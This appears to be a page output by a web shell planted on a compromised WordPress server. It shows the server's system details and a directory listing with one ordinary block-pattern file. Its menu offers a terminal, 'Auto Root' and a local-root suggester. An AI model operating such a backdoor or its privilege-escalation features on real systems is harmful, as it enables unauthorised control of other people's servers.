Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
wp-includes /
block-patterns /
Delete
Unzip
Name
Size
Permission
Date
Action
navigation-overlay-accent-bg.php
2.21
KB
-rw-r--r--
2026-07-03 02:00
navigation-overlay-black-bg.php
1.95
KB
-rw-r--r--
2026-07-03 02:00
navigation-overlay-centered-with-extras.php
3.27
KB
-rw-r--r--
2026-07-03 02:00
navigation-overlay-centered.php
1.63
KB
-rw-r--r--
2026-07-03 02:00
navigation-overlay.php
1.35
KB
-rw-r--r--
2026-07-03 02:00
query-grid-posts.php
972
B
-rw-r--r--
2022-05-24 20:50
query-large-title-posts.php
1.94
KB
-rw-r--r--
2022-05-24 20:50
query-medium-posts.php
1.03
KB
-rw-r--r--
2022-05-24 20:50
query-offset-posts.php
1.96
KB
-rw-r--r--
2022-05-24 20:50
query-small-posts.php
1.15
KB
-rw-r--r--
2022-05-24 20:50
query-standard-posts.php
808
B
-rw-r--r--
2022-05-24 20:50
social-links-shared-background-color.php
951
B
-rw-r--r--
2024-11-14 00:00
Save
Rename
<?php /** * Query: Grid. * * @package WordPress */ return array( 'title' => _x( 'Grid', 'Block pattern title' ), 'blockTypes' => array( 'core/query' ), 'categories' => array( 'query' ), 'content' => '<!-- wp:query {"query":{"perPage":6,"pages":0,"offset":0,"postType":"post","order":"desc","orderBy":"date","author":"","search":"","exclude":[],"sticky":"exclude","inherit":false},"displayLayout":{"type":"flex","columns":3}} --> <div class="wp-block-query"> <!-- wp:post-template --> <!-- wp:group {"style":{"spacing":{"padding":{"top":"30px","right":"30px","bottom":"30px","left":"30px"}}},"layout":{"inherit":false}} --> <div class="wp-block-group" style="padding-top:30px;padding-right:30px;padding-bottom:30px;padding-left:30px"><!-- wp:post-title {"isLink":true} /--> <!-- wp:post-excerpt /--> <!-- wp:post-date /--></div> <!-- /wp:group --> <!-- /wp:post-template --> </div> <!-- /wp:query -->', );